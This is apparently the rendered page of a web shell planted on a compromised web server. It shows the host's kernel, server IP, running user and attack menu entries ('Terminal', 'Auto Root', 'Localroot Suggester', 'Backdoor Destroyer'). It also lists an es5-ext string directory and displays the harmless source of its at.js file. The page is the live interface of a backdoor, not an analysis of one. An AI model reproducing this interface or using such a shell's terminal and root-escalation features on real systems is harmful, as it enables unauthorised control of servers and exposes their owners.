Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.147.225
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
es5-ext /
string /
# /
Delete
Unzip
Name
Size
Permission
Date
Action
@@iterator
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
code-point-at
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
contains
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
ends-with
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
normalize
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
repeat
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
starts-with
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
at.js
1.05
KB
-rw-rw-r--
2022-08-30 11:49
camel-to-hyphen.js
217
B
-rw-rw-r--
2022-08-30 11:49
capitalize.js
183
B
-rw-rw-r--
2022-08-30 11:49
case-insensitive-compare.js
182
B
-rw-rw-r--
2022-08-30 11:49
count.js
399
B
-rw-rw-r--
2022-08-30 11:49
hyphen-to-camel.js
224
B
-rw-rw-r--
2022-08-30 11:49
indent.js
420
B
-rw-rw-r--
2022-08-30 11:49
index.js
787
B
-rw-rw-r--
2022-08-30 11:49
last.js
196
B
-rw-rw-r--
2022-08-30 11:49
pad.js
583
B
-rw-rw-r--
2022-08-30 11:49
plain-replace-all.js
419
B
-rw-rw-r--
2022-08-30 11:49
plain-replace.js
314
B
-rw-rw-r--
2022-08-30 11:49
uncapitalize.js
220
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
// Based on: https://github.com/mathiasbynens/String.prototype.at // Thanks @mathiasbynens ! "use strict"; var toInteger = require("../../number/to-integer") , validValue = require("../../object/valid-value"); module.exports = function (pos) { var str = String(validValue(this)), size = str.length, cuFirst, cuSecond, nextPos, len; pos = toInteger(pos); // Account for out-of-bounds indices // The odd lower bound is because the ToInteger operation is // going to round `n` to `0` for `-1 < n <= 0`. if (pos <= -1 || pos >= size) return ""; // Second half of `ToInteger` // eslint-disable-next-line no-bitwise pos |= 0; // Get the first code unit and code unit value cuFirst = str.charCodeAt(pos); nextPos = pos + 1; len = 1; if ( // Check if it’s the start of a surrogate pair cuFirst >= 0xd800 && cuFirst <= 0xdbff && // High surrogate size > nextPos // There is a next code unit ) { cuSecond = str.charCodeAt(nextPos); if (cuSecond >= 0xdc00 && cuSecond <= 0xdfff) len = 2; // Low surrogate } return str.slice(pos, pos + len); };